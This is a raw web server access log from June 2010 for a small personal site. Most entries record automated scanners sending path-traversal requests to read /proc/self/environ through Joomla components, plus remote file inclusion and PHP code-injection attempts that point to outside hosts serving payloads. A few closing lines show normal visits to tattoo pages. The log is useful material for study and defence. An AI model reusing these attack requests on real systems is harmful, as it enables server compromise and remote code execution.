67.15.152.183 - - [28/Jun/2010:23:00:13 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:23:00:13 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
93.186.192.124 - - [28/Jun/2010:23:00:15 -0500] "GET /logs/access_log.1266710400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:23:00:16 -0500] "GET /logs/access_log.1266710400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.15.152.183 - - [28/Jun/2010:23:00:58 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:23:00:59 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:23:00:59 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
216.180.240.110 - - [28/Jun/2010:23:01:03 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:01:04 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:01:05 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:01:05 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:01:06 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:01:12 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:01:24 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:01:26 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:01:46 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:01:48 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
67.15.152.183 - - [28/Jun/2010:23:02:22 -0500] "GET /logs/access_log.1276214400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
216.180.240.110 - - [28/Jun/2010:23:03:07 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:03:07 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:03:09 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:03:18 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:03:41 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:03:42 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
91.121.64.99 - - [28/Jun/2010:23:04:18 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.31.149.80 - - [28/Jun/2010:23:04:28 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
216.180.240.110 - - [28/Jun/2010:23:04:57 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
81.31.149.80 - - [28/Jun/2010:23:04:59 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
216.180.240.110 - - [28/Jun/2010:23:05:00 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
91.121.64.99 - - [28/Jun/2010:23:05:12 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.31.149.80 - - [28/Jun/2010:23:05:17 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
93.186.192.124 - - [28/Jun/2010:23:05:20 -0500] "GET /logs/access_log.1266710400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
66.191.139.210 - - [28/Jun/2010:23:05:24 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:05:25 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:05:26 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:05:27 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:05:30 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:05:31 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
193.231.187.33 - - [28/Jun/2010:23:05:36 -0500] "GET /logs/access_log.1277164800/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
193.231.187.33 - - [28/Jun/2010:23:05:36 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
193.231.187.33 - - [28/Jun/2010:23:05:37 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
66.191.139.210 - - [28/Jun/2010:23:05:38 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:05:40 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
216.180.240.110 - - [28/Jun/2010:23:05:45 -0500] "GET /logs/access_log.1275782400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:05:45 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:05:45 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
66.191.139.210 - - [28/Jun/2010:23:05:46 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:05:48 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:05:49 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
67.15.152.183 - - [28/Jun/2010:23:06:00 -0500] "GET /logs/access_log.1275782400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:23:06:00 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:23:06:00 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
91.121.64.99 - - [28/Jun/2010:23:06:02 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
93.186.192.124 - - [28/Jun/2010:23:06:20 -0500] "GET /logs/access_log.1266710400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
216.180.240.110 - - [28/Jun/2010:23:06:22 -0500] "GET /logs/access_log.1275782400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:06:22 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:23:06:22 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
203.147.62.92 - - [28/Jun/2010:23:06:33 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:06:33 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:23:06:34 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:23:06:34 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:06:36 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
193.231.187.33 - - [28/Jun/2010:23:06:49 -0500] "GET /logs/access_log.1275264000/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
66.191.139.210 - - [28/Jun/2010:23:07:13 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.118.96.160 - - [28/Jun/2010:23:07:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
203.147.62.92 - - [28/Jun/2010:23:07:21 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
93.186.192.124 - - [28/Jun/2010:23:07:25 -0500] "GET /logs/access_log.1266710400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
66.191.139.210 - - [28/Jun/2010:23:07:43 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:07:47 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:08:10 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:08:24 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:08:26 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.31.149.80 - - [28/Jun/2010:23:08:39 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:23:08:39 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:23:08:39 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
66.191.139.210 - - [28/Jun/2010:23:08:46 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:08:51 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
91.121.64.99 - - [28/Jun/2010:23:09:09 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.64.99 - - [28/Jun/2010:23:09:09 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.64.99 - - [28/Jun/2010:23:09:10 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.31.149.80 - - [28/Jun/2010:23:09:16 -0500] "GET /logs/access_log.1275782400//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
91.121.64.99 - - [28/Jun/2010:23:09:49 -0500] "GET /logs/access_log.1275782400//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
66.191.139.210 - - [28/Jun/2010:23:09:54 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:10:08 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
81.31.149.80 - - [28/Jun/2010:23:10:49 -0500] "GET /logs/access_log.1276819200//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:23:10:49 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.31.149.80 - - [28/Jun/2010:23:10:49 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
66.191.139.210 - - [28/Jun/2010:23:11:10 -0500] "GET /logs/access_log.1275782400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:11:10 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:11:10 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
91.121.64.99 - - [28/Jun/2010:23:11:11 -0500] "GET /logs/access_log.1276819200//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.64.99 - - [28/Jun/2010:23:11:12 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.64.99 - - [28/Jun/2010:23:11:12 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
66.191.139.210 - - [28/Jun/2010:23:11:46 -0500] "GET /logs/access_log.1275782400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:11:46 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.191.139.210 - - [28/Jun/2010:23:11:46 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
206.210.68.43 - - [28/Jun/2010:23:11:54 -0500] "GET /logs/?htmlclass_path=http://www.dong69.co.kr/xe/ganyot/test.gif?? HTTP/1.1" 200 11360 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
206.210.68.43 - - [28/Jun/2010:23:11:54 -0500] "GET /?htmlclass_path=http://www.dong69.co.kr/xe/ganyot/test.gif?? HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
58.179.124.211 - - [28/Jun/2010:23:12:54 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com.au/search?q=1950%27s+tattoo+flash&hl=en&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&channel=s&ndsp=18&ei=xnEpTObANtWgkQWYz_yRBA&start=10&sa=N""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:12:55 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:12:55 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:12:55 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:12:55 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:12:57 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:12:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:09 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:09 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
58.179.124.211 - - [28/Jun/2010:23:13:09 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
